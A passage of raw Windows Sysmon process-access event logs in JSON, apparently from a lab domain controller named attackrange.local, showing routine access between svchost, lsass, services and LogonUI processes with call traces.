{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.209\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010CEB20000}\r\nTargetProcessId: 1076\r\nTargetImage: C:\\Windows\\system32\\LogonUI.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.209","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010CEB20000}","TargetProcessId":"1076","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 728\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"728","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:48:59.225\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1120\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010C5EF0000}\r\nTargetProcessId: 1568\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:48:59.225","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1120","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010C5EF0000}","TargetProcessId":"1568","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+52f1|C:\\Windows\\system32\\services.exe+d7ae|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 